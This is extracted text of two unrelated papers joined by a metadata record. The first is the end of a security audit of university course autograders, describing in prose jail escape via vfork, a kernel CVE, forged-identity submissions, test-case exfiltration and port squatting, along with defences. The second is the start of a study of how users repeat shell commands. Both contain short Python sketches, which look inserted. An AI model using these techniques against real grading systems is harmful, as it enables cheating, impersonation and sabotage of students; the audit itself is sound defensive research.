12:23:56 EDT 2015 x86_64 x86_64 x86 64 GNU/Linux). We were able to cause a memory leak by exploiting CVE-2016-0728[1], and, with additional work, we believe we could gain root access and break out of the jail’s `chroot()`. 5.4 Defenses Short-Term Defenses Most of the serious vulnerabilities we discovered stemmed from the jailbreak technique we disclosed in section 5.3. These can be trivially fixed by removing `vfork()` from the whitelist of acceptable system calls. The jailbreak-free memory-hiding technique in section 5.3 stemmed from the ability to hide memory elsewhere. The specific techniques we used can be defended against by disallowing the `pipe()` system call and restricting or preventing the `open()` system call (or simply setting proper file permissions in the `chroot` jail). To fix the blocking persistence bug, the autograder should kill processes after they exceed a certain amount of real time. 
Using user/system time is preferable for grading student submissions, but we suggest a maximum real-time cutoff as well. This limit should be several times longer than the user+system time. Long-Term Defenses The EECS 281 autograder seeks to properly measure the time and memory usage of student programs, and the jail provides a strong defense against cheating at those goals. However, custom-made security systems frequently have serious vulnerabilities like the ones we described above. We recommend that 281 keep its current jail implementation, but would encourage them to also install commercially-available, open-source security applications, such as Docker, that are specifically designed to contain the execution of untrusted code. We also recommend that the 281 staff make use of built-in Linux security systems, such as process resource limits, and that they install a firewall to prevent student code from connecting to any address other than localhost. Finally, we recommend that the EECS 281 staff keep their autograder's operating system up-to-date, so that students cannot exploit publicly known vulnerabilities. 6 EECS 370 EECS 370 (Introduction to Computer Organization) is a required introductory hardware course for Computer Science students. Typical course projects include assembly programs, processor simulators written in C, and other hardware-related programs. 6.1 Submission Architecture Submission occurs by way of a publicly-available perl script. This script packages student files, obtains the identity of the current user, and sends the source code to the autograder via unencrypted email. The acquisition of the session username is of particular interest, as the username included in the email’s FROM header represents the one and only means of server-side user identification. Because the submission script runs on the client side, the username may be trivially forged. 6.2 Evaluation Architecture When the autograder receives an email, the submission is forwarded to a perl script responsible for evaluation. The student code is compiled, and a "student process" is spawned. This student process runs with the same privilege as the autograding script (ability to use various system calls), and a 30 second cpu time limit is enforced to prevent autograder hangups. The student program is fed test cases, and its output is verified against expected output from an instructor-developed solution. 6.3 Exploitation Impersonation The submission process for the EECS 370 autograder involves no authentication. The student has complete influence over the submission script, and may trivially alter them to forge an identity of their choosing. We successfully mounted such an attack, impersonating other members of our pen-test team. This exploit could be used to sabotage other students by spending their late days (currency that allows a student to submit an assignment late) or by delivering malicious payloads under their name. Test Case Exfiltration As with the EECS 281 autograder, we were able to successfully exfiltrate test cases. The task was trivial in this case, as there are no system call restrictions on the student-code process and no firewalls to prevent a socket from being opened to an external server. Logging defenses present no issue due to the ease of impersonating other users, as described above. The privilege and lax limits placed on the student process could, beyond mere exfiltration, allow a student to damage the autograder in an attempt to delay a project deadline. 
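The kind of process-level restrictions whose absence makes these attacks trivial can be approximated in a few lines of standard-library code. The sketch below is our own minimal illustration, not code from any of the graders studied; the limit values and the student binary path are placeholders, and a real deployment should still layer containerization, a firewall, and logging on top, as recommended elsewhere in this paper.

```python
import resource
import subprocess

def _restrict():
    """Applied in the child just before exec: cap CPU time, address space,
    process creation, and output file size for the untrusted submission."""
    resource.setrlimit(resource.RLIMIT_CPU, (30, 30))             # 30 s of CPU time
    resource.setrlimit(resource.RLIMIT_AS, (512 * 2**20,) * 2)    # 512 MiB of memory
    resource.setrlimit(resource.RLIMIT_NPROC, (0, 0))             # no new processes
    resource.setrlimit(resource.RLIMIT_FSIZE, (16 * 2**20,) * 2)  # 16 MiB output files

def run_submission(executable, test_input, wall_clock_limit=60):
    """Run a student binary on one test case (test_input as bytes) with
    resource limits and a real-time cutoff so a blocked process cannot hang."""
    try:
        proc = subprocess.run(
            [executable],
            input=test_input,
            capture_output=True,
            preexec_fn=_restrict,       # runs in the child, before exec
            timeout=wall_clock_limit,   # wall-clock kill, independent of CPU time
        )
        return proc.returncode, proc.stdout
    except subprocess.TimeoutExpired:
        return None, b""                # treat as a failed or hung submission
```

The wall-clock timeout in this sketch also closes the "blocking persistence" hole described in section 5.3, since a process stuck on a blocking read is killed regardless of how little CPU time it has consumed.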
6.4 Defenses Web-Interface Based authentication Most universities provide a web-based means of authentication, such as that found at `weblogin.umich.edu`, that governs access to a variety of university systems. Such centralized authentication systems are typically maintained by dedicated teams, and tend to be more robust and better-tested than homemade counterparts such as the EECS 370 submission script. Professionally maintained systems such as these increase security by removing the authentication process from the student’s sphere of influence. Policy-based protection EECS 370 assigns project grades based on each student’s highest scoring submission. While this does not provide a defense against the attacks described above, it does prevent malicious users from sabotaging a student’s grade by submitting broken or low-scoring code under the victim’s name near the project deadline. Proper Sandboxing of Foreign Code Student submitted code is compiled and executed with an unnecessarily high level of privilege. As stated in our analysis of the EECS 281 autograder, a proper sandbox comprised of firewalls, process limits, and filesystem isolation would reduce the potential destructive capability of untrusted code. 7 EECS 280 EECS 280 (Programming and Introductory Data Structures) is the second programming course students take at the University of Michigan. In it, students write C++ programs on topics such as recursion, object-oriented programming, and dynamic memory management. 7.1 Submission Architecture Students submit source code files via a Django-based web form. After submitting, students see tests with descriptive names, and whether they passed those tests or not. Not all test results are revealed to students. Some test cases provide additional output regarding whether the student leaked memory, which may affect the final grade. The use of Django in the autograder’s web-interface prevents the web developer from writing any SQL code, thus protecting against some forms of injection. 7.2 Evaluation Architecture When a student submits code, the code is extracted from the input form, compiled, and run with a variety of inputs. The code is run inside a Docker container configured to have no external network stack and an NPROC limit of zero, i.e., the code cannot create processes. The container may also be configured to prevent opening and closing of files, depending on the test. Processes exceeding a set limit on wall clock time are terminated with kill -9. Output is then checked for correctness outside the container, and results are sent back to the student. 7.3 Exploitation We discovered only minor vulnerabilities in the EECS 280 autograder. These are discussed below. Memory Leak Hiding Some EECS 280 test cases deduct points if they detect a memory leak in student code. This is measured with Valgrind, which reports a leak if a block of allocated memory has not been freed when a program exits. This method can only detect a subset of memory leaks, failing to detect memory that is deleted before the program exits but is retained longer than needed. Therefore, we were able to construct a submission which automatically frees all allocated memory when the program ends, even if the student does not write a main() function and, therefore, does not have control over when the program ends. We believe EECS 280 students have sufficient skill to mount this attack. 
Known Vulnerabilities The EECS 280 autograder uses a fairly new Linux version: Linux eecs280-VirtualBox 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux. Therefore, it is safe from most known kernel exploits, but it is still susceptible to CVE-2016-0728, with the same ramifications as described in section 5. 7.4 Defenses Short-Term Defenses Defending against the memory leak attack requires a different method of measuring leaked memory. Instead of looking for memory which remains leaked at the end of the program, the autograder should enforce the following rule: while the number of objects allocated by the autograder remains bounded, the amount of memory used by those objects must also remain bounded. Consider how this rule could be applied if the student’s assignment involved creating a class which allocates memory in its constructor and deletes it in its destructor. The autograder can repeatedly create and destroy instances of that class. If the memory in use by the program continues to increase over time, then the autograder has detected a memory leak. We recommend implementing this detection method, but we do not recommend removing the Valgrind-based leak check, as it provides easily de-bugged feedback to students. To defend against the kernel-based privilege escalation, we recommend that the autograder operating system be frequently updated, at least with regards to security-sensitive patches. Long-Term Defenses Because the EECS 280 autograder already implements the defense mechanisms we recommend for secure autograder implementation, and because we found no serious vulnerabilities, we have no recommendations for long-term changes to the this system. Instead, we simply recommend that the autograder infrastructure be kept up-to-date and security patches be applied in a timely fashion. 8 EECS 485 EECS 485 (Web Databases and Information Systems) is a web development class in which several early projects require students to build a photo sharing website. The projects integrate a Python Flask/MySQL back end with a front end that uses Jinja templates and JavaScript. 8.1 Architecture EECS 485 uses the same autograder software as EECS 280. Therefore, it has the same exceptional level of security against malicious student code. However, EECS 485 has a very different submission and evaluation architecture. In EECS 280, students submit files to be compiled and run on a separate server. In EECS 485, however, students run public facing websites on an assigned port of a university-provided server, which hosts several student groups. In order to prevent theft or sharing of code, students only have read and write permissions in their assigned directory on the server. When a student wishes for their project to be evaluated, they submit a request to the autograder, rather than submitting their code to be run on an external server as in the previously discussed models. The autograder then issues a series of requests corresponding to hidden test cases, evaluates the responses provided by the student site, and returns a summary of which tests the submission passed/failed. This project structure provided an additional attack surface not present in the EECS 280 model and allowed us to successfully mount a variety of attacks ranging from exfiltration of test case details to stealing code written by other students. 8.2 Exploitation Exposing Student Code EECS 485 students run their servers on remote machines, with several groups assigned to each machine. 
While students do not have read access to other groups’ directories, the hosted websites are public facing, so anyone with the URL could easily navigate to another student’s site and access their HTML and JavaScript files. Because the URLs are fixed for each project, it would be a simple matter for a student to scan the server for active ports and access another group’s site. To prevent this, each student group is provided with a “secret key” comprising 20 hexadecimal characters that must be included in the URL for each page on their site. The key space is $2^{80}$, which makes a brute force attack infeasible, even if the port number is known. While URLs that point to dynamically generated content are protected by this “secret key” system, static files, such as images and, more importantly, JavaScript files, are served from a directory whose file path does not contain this secret string. Therefore, a student can mount a fairly simple attack by running a port scan on the server to determine which ports are open, then searching under /static/js/ for common file names such as main.js or app.js. Additionally, if a student site uses the base HTML template provided by the course staff to serve pages for invalid URLs, the static files will be served on the 404 page, removing the burden of guessing the JavaScript filename. Furthermore, these JavaScript files frequently contain asynchronous calls to controller methods whose URLs contain the secret string, allowing an attacker to gain full access to the front end of another group’s site. In order to test the validity of this attack without running a port scan on the EECS 485 server, one member of our team set up a personal server and hosted a dummy website on a randomly selected port, using a file structure analogous to that used in an EECS 485 project. A second team member, given only the domain name of the site, was able to determine the port number, access the JavaScript, and acquire the secret string. Port Squatting The autograder assigns each group a particular port to use for running their server. Because multiple groups share the same server, port squatting becomes a serious issue. Because a process cannot bind to a port which has already been bound, any student with access to the server may block another group’s submission by binding their server to that group’s port. This is a particularly concerning issue, since students could leverage this to prevent other groups from submitting. Furthermore, it would be difficult to prove malicious intent, as the student blocking the port could claim that they had done so accidentally. Additionally, if one member of a group runs a server on their group’s port, the other students in the group will be unable to submit until that server is shut down. 8.3 Request Logging EECS 485 is unique among the autograders we tested in that students control the directory in which their code executes during the grading process. Therefore, a student could easily log requests made by the autograder to a local file during grading. This represents a partial leak of test cases, as a student is able to record requests sent to their server by the autograder, although never the correct behavior that the autograder is checking for. We can see no simple way to definitively protect against this attack, other than running student code directly on the autograder machine. 
The scope of this vulnerability could be limited by not running certain tests until after the submission deadline, but this both inconveniences students by obscuring their full grade, and provides only a short-term solution, as a student could record the test cases to distribute to students who take the course in subsequent terms. 8.4 Defenses The exploit that allowed students to circumvent the secret key system by examining static files can be remedied by requiring students to serve their static content from paths that include the secret string. Flask’s ”send from directory” function provides one simple way to do this. There are a few ways to solve the intra-group port squatting problem. One solution is to assign port numbers to each student, rather than to each group; another is to provide only a single user account per group, rather than independent user accounts per student, so that one student can kill the server of another student in the group and reclaim their port. Solving the inter-group problem is somewhat harder. Linux provides no built-in way to restrict which ports a particular user can open (beyond the well-known-ports restriction). One solution is to run each group’s code in a Docker container (or VM) and to publish only the appropriate port on the container. There is, however, a solution that solves both problems. Rather than assigning ports to each group, let a student pick any port and specify their chosen port upon submission. This would prevent any other users from squatting on their port, as they could simply choose another. We originally worried this would allow a malicious student to submit the port for another student’s site, thereby claiming credit for the victim’s work. However, the secret strings described previously would prevent this. This change requires minimal modification to the existing autograder; therefore, this is the solution we recommend. 9 Discussion and Conclusions This section will serve primarily as a resource for instructors wishing to implement autograders for their own courses. We observed serious vulnerabilities in three of the four autograders we surveyed. The one without serious vulnerabilities, EECS 280, was written from the ground up with security as a primary concern and implements modern defenses. Thus, we will use it as our model of a strong, well-sandboxed autograder. 9.1 Defense in Depth "Defense in Depth" is a classic military idea promoting the benefits of multi-layer defense as opposed to one-layer defense. Additional layers of security provide redundancy, such that the failure of one layer doesn’t compromise the entire system. We were able to bypass a single layer of defense on many of the autograders; our attacks may have been thwarted with the presence of multiple layers. The jail implemented in the EECS 281 autograder is certainly a useful system, but once we broke free of the jail, we were able to execute arbitrary code with the same permissions as the autograder process. Had the autograder implemented a firewall in addition to the jail, we would have been unable to exfiltrate test cases. Had Linux process limits been used, we would have been unable to fork processes, which would have prevented us from breaking the jail in the first place. Each of these security elements provide valuable defenses, but implementing them all together minimizes the damage that can be done in the event that one component fails. 
We strongly recommend that autograders rely not just on their own custom security systems, but on firewalls, containerization, and well-configured process limits in combination. Our inability to break the EECS 280 autograder, which implements all these defenses, is a testament to the effectiveness of the ”defense in depth” strategy. 9.2 Professional / Open-Source Defenses Problems frequently occur when individuals attempt to create their own security software. This does not imply that these developers are incompetent. Rather, it speaks to the difficulty of implementing sound security measures with limited resources, a situation not uncommon for course staffs developing autograders. Their efforts are typically split between development, teaching, and research, and they simply do not have the time to perform a comprehensive security analysis of their autograding systems. The value of having many eyes examine a system (in the case of open source) or a dedicated team to develop and review security software (in the case of a professional product) cannot be overstated, as this increases the odds of successfully detecting vulnerabilities and results in hardened and well-tested systems. This paper serves as an example of how even competently designed custom systems, such as the EECS 281 autograder, can contain subtle but serious vulnerabilities, while EECS 280, which relied on thoroughly tested defenses such as Docker, firewalls, and built-in Linux security measures, resisted all our exploitation efforts. Thus, we strongly recommend that autograder developers choose to use open source or professionally developed security frameworks and defenses, rather than implementing custom solutions. 9.3 Detection A distinguishing characteristic of the autograder model is that submissions are tied to a student’s identity. If a student wishes to cheat, they need not only exploit flaws in the autograder, but also do so without being detected. Logging and notification mechanisms, then, are invaluable security tools. The jail in the EECS 281 system, for example, logs any use of system calls which it considers particularly illicit. While an attack that managed to escape the jail would have gone unnoticed, the logging system would have detected any failed exploitation attempts leading up to the successful attack. Logs are only useful if someone reads them; therefore, systems should notify administrators in the event of notable violations. The benefits of effective detection are predicated on the truth of our assumption that autograder submissions are tied to the identity of the submitting student. Two of the autograders we surveyed, EECS 485 and EECS 370, failed in this regard. EECS 485 allowed students to access their classmates’ code over the internet, rendering it difficult or impossible to identify the culprit, while EECS 370 allowed students to tie arbitrary submissions to the names of other students. This vulnerability is particularly serious, as it not only allows students to get away with cheating or bringing down the autograder, but also allows them to blame the attack on someone else, which may endanger the victim’s career or academic standing. Because detection can significantly strengthen security and because incorrect attribution of submissions can cause serious harm, we conclude that accurate identification of students is the single most important defensive measure an autograder can have. 
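As a small, hypothetical illustration of pairing logging with notification, the sketch below wires a violation logger to both a log file and an e-mail alert using only Python's standard library. The host name and addresses are placeholders; course staff would substitute their own alerting channel.

```python
import logging
from logging.handlers import SMTPHandler

def build_violation_logger():
    """Log every denied operation to a file, and e-mail staff on anything
    flagged as a likely exploitation attempt (WARNING and above)."""
    logger = logging.getLogger("autograder.jail")
    logger.setLevel(logging.INFO)
    logger.addHandler(logging.FileHandler("jail_violations.log"))

    mailer = SMTPHandler(
        mailhost="localhost",                    # placeholder SMTP relay
        fromaddr="autograder@example.edu",       # placeholder addresses
        toaddrs=["course-staff@example.edu"],
        subject="Autograder: possible exploitation attempt",
    )
    mailer.setLevel(logging.WARNING)
    logger.addHandler(mailer)
    return logger

# Example use inside a jail wrapper: record the submitting user with every
# event so that failed attempts can be attributed (assuming submissions
# are properly authenticated in the first place).
log = build_violation_logger()
log.warning("uniqname=%s blocked syscall=%s", "studentx", "socket")
```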
10 Future Work While our examination of the four department autograders has both increased the security of courses at the University of Michigan and provided valuable insights into the topic of autograder design and implementation, four systems comprise a small sample size. Ideally, future work would study a larger number of systems from several different universities. A more diverse set of subjects would provide a better picture of the state of the art and would likely yield more widely applicable conclusions regarding autograder security. 11 Acknowledgments We would like to thank the staffs of EECS 280, EECS 281, EECS 370, and EECS 485 for providing access to their autograding systems. In particular, we would like to thank James Perretta, Waleed Khan, and Don Winsor for their considerable assistance in setting up and using their autograder systems. The support of our professor, Alex Halderman, allowed this project to get off the ground, and his weekly security lectures provided us the proper skills and mindset to succeed in our penetration testing. 12 Availability Code for the attacks described in this document is available at: https://ianpudney.com/autograder-audit Source code for the autograders and exfiltrated test cases will not be made public, per section 4. References Appendix A Diagrams Figure 1: A diagram showing the process of bypassing EECS 281 performance limitations, as described in section 5.3
{"Source-Url": "https://ianpudney.com/autograder-audit/paper/autograder-audit.pdf", "len_cl100k_base": 7238, "olmocr-version": "0.1.50", "pdf-total-pages": 9, "total-fallback-pages": 0, "total-input-tokens": 25931, "total-output-tokens": 8192, "length": "2e12", "weborganizer": {"__label__adult": 0.0010519027709960938, "__label__art_design": 0.0009927749633789062, "__label__crime_law": 0.0097503662109375, "__label__education_jobs": 0.05364990234375, "__label__entertainment": 0.0002503395080566406, "__label__fashion_beauty": 0.0004911422729492188, "__label__finance_business": 0.0007534027099609375, "__label__food_dining": 0.000904083251953125, "__label__games": 0.002422332763671875, "__label__hardware": 0.0039520263671875, "__label__health": 0.0015392303466796875, "__label__history": 0.0007615089416503906, "__label__home_hobbies": 0.0003323554992675781, "__label__industrial": 0.0014848709106445312, "__label__literature": 0.0009174346923828124, "__label__politics": 0.0009870529174804688, "__label__religion": 0.0009012222290039062, "__label__science_tech": 0.1595458984375, "__label__social_life": 0.00054168701171875, "__label__software": 0.030029296875, "__label__software_dev": 0.72607421875, "__label__sports_fitness": 0.0008091926574707031, "__label__transportation": 0.0013599395751953125, "__label__travel": 0.0003554821014404297}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 36922, 0.0375]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 36922, 0.47519]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 36922, 0.9404]], "google_gemma-3-12b-it_contains_pii": [[0, 3560, false], [3560, 8536, null], [8536, 13103, null], [13103, 17608, null], [17608, 21916, null], [21916, 26887, null], [26887, 31919, null], [31919, 36786, null], [36786, 36922, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3560, true], [3560, 8536, null], [8536, 13103, null], [13103, 17608, null], [17608, 21916, null], [21916, 26887, null], [26887, 31919, null], [31919, 36786, null], [36786, 36922, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 36922, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 36922, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 36922, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 36922, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 36922, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 36922, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 36922, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 36922, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 36922, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 36922, null]], "pdf_page_numbers": [[0, 3560, 1], [3560, 8536, 2], [8536, 13103, 3], [13103, 17608, 4], [17608, 21916, 5], [21916, 26887, 6], [26887, 31919, 7], [31919, 36786, 8], [36786, 36922, 9]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 36922, 0.0]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
7f6ae168f6874aa5ac6abf9f5a072c223b39c1ba
How Users Repeat Their Actions on Computers: Principles for Design of History Mechanisms Saul Greenberg and Ian H. Witten Department of Computer Science The University of Calgary, Calgary, Alberta, Canada T2N 1N4 Abstract Several striking characteristics of how often people repeat their actions on interactive systems are abstracted from usage data gleaned from many users of different classes over a period of months. Reformulated as empirically-based general principles, these provide design guidelines for history mechanisms specifically and modern user interfaces generally. Particular attention is paid to the repetition of command lines, and to the probability distribution of the next line given a sequential "history list" of previous ones. Several ways are examined of conditioning this distribution to enhance predictive power. A brief case study of actual use of a widely-used history system is also included. Keywords: Command-based systems; command re-use; history mechanisms; human-computer interaction; design principles. Introduction Flexible interfaces create an environment in which users can pursue goals not considered specifically by any one application package. This paper addresses those top-level interfaces that provide a rich set of executable actions and objects. Actions are traditionally invoked by typing simple commands, although some modern systems augment or replace this primitive dialogue style with menus, forms, natural language, graphics, and so on [19]. Typically, these interfaces either provide uniform access to all system actions or group these actions in some pre-defined way. Human usage of such computers is characterized by certain patterns of activity that are ill supported by contemporary interfaces. In particular, although it is well known that users often repeat actions, most systems do little to allow them to review and re-execute previous ones. Typically, they must be laboriously re-typed or re-selected through menu navigation. Those systems that do provide assistance offer ad hoc "history" mechanisms that employ a variety of recall strategies: History through glass teletypes. Special textual syntactic constructs allow previous events to be recalled, usually by position on an event list (relative or absolute), or by pattern-matching. Examples are the UNIX csh [12] and the INTERLISP-D Programmer's Assistant [16]. History through graphical selection. A menu of previous events is presented which are manipulated graphically. HISTMENU[5] and MINIT's "window management window" [4] are two examples. History through editing. Any text appearing in the dialogue transcript can be copied to and edited further in the command input area. Examples include Apollo's DOMAIN window "pads" [1] and command interpreters running within the emacs editor [14]. History for menu navigation. Previously chosen menu items become more readily available than the default. The "bookmarks" capability of the Symbolics Document Examiner is one example [15]. Another is an adaptive algorithm that favourably relocates previously chosen items in a menu hierarchy [20], which has found success in an experimental telephone directory [9,17]. History through prediction. Within the current context, the system estimates for each token already seen the probability that it will be the next one typed. The one(s) with the highest probabilities are made available for selection (eg "Predict" [22] and the "Reactive Keyboard" [21]). History through programming by example. 
Fixed sequences of actions are saved as a procedure, perhaps allowing some generalizations to be made [18]. Most history mechanisms are based on the simple premise that the last n user inputs are a reasonable working set of candidates for re-selection. But is this premise correct? Might other strategies work better? Indeed, is the dialogue sufficiently repetitive to warrant history mechanisms in the first place? As existing systems are designed through intuition rather than from empirical knowledge of user interactions, it is difficult to judge how effective they really are or what scope there is for improvement. Cite as: <table> <thead> <tr> <th>Sample Name</th> <th>Sample Size</th> <th>Recurrence Rate mean std dev</th> <th>Users of History actual (%)</th> <th>Mean rate of history uses (%)</th> </tr> </thead> <tbody> <tr> <td>Novice Programmers</td> <td>55</td> <td>80.4% 7.2</td> <td>11/55 20%</td> <td>2.03</td> </tr> <tr> <td>Experienced Programmers</td> <td>36</td> <td>74.4% 9.7</td> <td>33/36 92%</td> <td>4.23</td> </tr> <tr> <td>Computer Scientists</td> <td>52</td> <td>67.7% 8.2</td> <td>37/52 71%</td> <td>4.04</td> </tr> <tr> <td>Non-Programmers</td> <td>25</td> <td>69.4% 8.1</td> <td>9/25 36%</td> <td>4.35</td> </tr> <tr> <td>Total</td> <td>168</td> <td>73.8% 9.6</td> <td>90/168 54%</td> <td>3.89</td> </tr> </tbody> </table> Table 1: Sample sizes, recurrence rates and history uses of each group This paper investigates user behavior relevant to the design of history mechanisms. The primary objective is to formulate general principles of how users repeat their actions on computers. The investigation is based upon analysing long-term records of user-computer interaction with an imperative interface, collected as described in the following section. The research questions raised in the subsequent section help focus exploration of the large data set, and the results are analyzed from a variety of perspectives. A discussion follows in the last section, where specific principles are developed. The UNIX `csh` command interpreter was used as a vehicle for this study, as it has been for many earlier investigations of how users interact with command-based interfaces. Its popularity makes it relatively easy to find and observe diverse sample groups of users in a realistic setting \(^1\). Although the command interface no longer represents current ideas in interface design, it is assumed that observed usage patterns are fundamental to similar computer-based imperative interactions. Studies of UNIX usage have already affected the design of leading-edge systems. For example, [6] described a multiple virtual-workspace interface to support user task switching, motivated by the UNIX study of [2]. **Data Collection** Command-line data was collected continuously for four months from users of the Berkeley 4.2 UNIX `csh` command interpreter [12]. The start of every login session was noted, and all commands and arguments passed to `csh` were recorded sequentially. Each command entry was annotated with the current working directory, history and alias usage, and system errors (if any). From the user's point of view, the monitoring facility was unobtrusive — the modified command interpreter was identical in all visible respects to the standard version. Four target groups were identified, representing a total of 168 users with a wide cross-section of computer experience and needs (Table 1). Salient features of each group are described below. 
**Novice Programmers.** Enrolled from an introductory Pascal course, these have little or no previous exposure to programming, operating systems, or UNIX-like command-based interfaces. Subjects spend most of their computer time learning how to program and use the basic system facilities. **Experienced Programmers.** Members were senior Computer Science undergraduates, expected to have a fair knowledge of programming languages and the UNIX environment. As well as coding, word processing, and employing more advanced UNIX facilities to fulfill course requirements, subjects also use the system for social and exploratory purposes. **Computer Scientists.** This group, comprised of Faculty, graduates and researchers from the Department of Computer Science, is very familiar with UNIX. Tasks performed are less predictable and more varied than other groups, spanning advanced program development, research investigations, social communication, maintaining databases, word-processing, satisfying personal requirements, and so on. **Non-programmers.** Word-processing and document preparation is the dominant activity of this group, made up of office staff and members of the Faculty of Environmental Design. Little program development occurs — tasks are usually performed with existing application packages. Knowledge of UNIX is the minimum required to get the job done. Considerable variation was present in the number of command lines entered by individual subjects (\(mean = 1712, std dev = 1499\)). **Data Analysis** Four questions particularly relevant to history mechanisms are addressed here. They all concern the statistics of complete command lines entered by the user, since history mechanisms usually involve the whole command line. First, we look at how often a user actually repeats command lines over the course of a dialogue. Second, we describe the probability distribution that the next command line will match a user's previous inputs by location in an event list. Third, since this distribution depends upon a simple model of arranging and matching the user's command history, alternative models are evaluated which condition the distribution in different ways. Finally, we note how people actually use the existing UNIX `csh` history facility. \(^1\) But see [3] for problems encountered even here. In the following discussion, a command line is a single complete line (up to a terminating carriage return) entered by the user. This is a natural unit because commands are only interpreted by the system when the return key is typed. Command lines typically comprise an action (the command), an object (e.g., files, strings) and modifiers (options). A sequential record of command lines entered by a user over time, ignoring boundaries between login sessions, is called a history list. Unless stated otherwise, the history list is a true record of every single line typed — duplicates are not pruned. The distance between two command lines is the difference between their positions on the list. A working set is a small subset of items on the history list. The number of different entries in the history list is the command line vocabulary. Although white space is ignored, syntactically different but semantically identical lines are considered distinct. Recurrence of command lines Most history mechanisms simplify redoing the complete command line, rather than its isolated components. 
Although it is known that only a small set of commands account for all user actions [2,7,8,11,13] \(^2\), it is not known how often complete command lines recur. One might expect that they would not recur often, given the limitless possibilities and combinations of commands, modifiers and arguments. Surprisingly, this is not the case. Although users extend their vocabulary of command lines continuously and uniformly over the duration of an interaction, the majority of lines entered are recurrences. Table 1 lists the mean recurrence rate and standard deviation for each subject group. An analysis of variance of raw scores rejects the null hypothesis that these means are equal \((F(3, 164) = 21.42, p < .01)\). The Fisher PLSD multiple comparison test suggests that all differences between group means are significant \((p < .01)\), excepting the Non-programmers versus Scientists. As the Table indicates, the mean recurrence rate for groups ranges between 68% and 80%, with Novice Programmers exhibiting the highest scores. Still, it is reasonable to approximate the recurrence rate by the population mean of 74%. That is, about three out of every four command lines entered by the user already exist on the history list. Conversely, an average of one out of every four appears for the first time. Command line frequency as a function of distance For any command line entered by a user, the probability that it has been entered previously is quite high. But what is the probability distribution of that recurrence over each previous input? Are recurrence distances, for example, spread uniformly across the distribution or skewed to the most recently entered items? If a graphical history mechanism displayed the previous \(n\) entries as a menu (e.g., HISTMENU [5]), what is the probability that this includes the next entry? The recurrence distribution as a measure of distance was calculated for each user, and group means are plotted in Figure 1. The vertical axis represents the rate of command line recurrences, while the horizontal axis shows the position of the repeated command line on the history list relative to the current one. Taking Novice Programmers, for example, there is an 11% probability that the current command line is a repeat of the previous entry (distance = 1), 28% for a distance of two, and so on. The most striking feature of the Figure is the extreme recency of the distribution. The previous seven or so inputs contribute the vast majority of recurrences. It is not the last but the second to last command line that dominates the distribution. The first and third are roughly the same, while the fourth through seventh give small but significant contributions. Although probability values continually decrease after the second item, the rate of decrease and the low values make all distances beyond the previous ten items practically equivalent. This is illustrated further in the inset of Figure 1, which plots the same data for the grouped total as a running sum of the probability over a wider range of distances. The most recently entered command lines on the history list are responsible for most of the accumulated probabilities. In comparison, all further contributions are slight (although their sum total is not). The horizontal line at the top represents a ceiling to the recurrence rate, as 26% of all command lines entered are first occurrences. 
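The distance distribution plotted in Figure 1 is straightforward to recompute for any trace: for each command line, measure how far back its most recent prior occurrence lies, then normalise the counts by the trace length. The sketch below is our own illustration of that calculation, not the instrumentation or analysis code used in the study.

```python
from collections import Counter

def recurrence_distribution(history):
    """For each command line in a trace, measure the distance back to its most
    recent previous occurrence (1 = the immediately preceding line).
    Returns (probability per distance, fraction of first occurrences)."""
    last_seen = {}          # command line -> index of its latest occurrence
    distances = Counter()
    new_lines = 0
    for i, line in enumerate(history):
        if line in last_seen:
            distances[i - last_seen[line]] += 1
        else:
            new_lines += 1
        last_seen[line] = i
    total = len(history)
    probs = {d: n / total for d, n in sorted(distances.items())}
    return probs, new_lines / total

# Toy trace showing the kind of working-set behaviour described in the text.
trace = ["ls", "edit draft", "print draft", "edit draft", "ls", "edit draft"]
probs, first_rate = recurrence_distribution(trace)
print(probs)        # {2: 0.333..., 4: 0.166...}
print(first_rate)   # 0.5 of the lines are first occurrences
```

Summing these probabilities over the last n distances gives the working-set coverage discussed below (for example, the roughly 43% figure quoted for a seven-item working set); applied to a real csh trace, it yields curves of the kind shown in Figure 1.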
Figure 1 also shows that the differing recurrence rate between user groups, noted previously in Table 1, can be attributed to the three previous command lines. Recurrence rates are practically identical elsewhere in the distribution. This difference is strongest on the second to last input, the probability ranging from a low of 10% for Scientists to a high of 28% for Novice Programmers.

Conditioning the distribution

The recurrence distributions were derived by considering all user input as one long sequential stream, with no barriers placed between sessions. We have seen that a small local working set of command lines accounts for a high portion of repetitions. Consider a working set of the seven previous items on the history list. From the inset in Figure 1, there is a 26% chance that the next command line has not appeared before, a 43% chance that it has recurred within the working set, and a 31% chance that it last appeared further back. This section explores the possibility that the distribution can be conditioned to increase the recurrence probabilities. Three conditioning techniques are discussed: context sensitivity by directory, pruning repetitions, and partial matching.

Figure 1: Recurrence distribution as a measure of distance

Redundancies on the history list can be pruned in one of two ways, as described by [4]. The first saves the command line in its original position on the history list while the second saves it in its latest position (Table 2). The latter was selected for study, as not only is local context maintained, but unique and low probability entries will migrate to the back of the list over time.

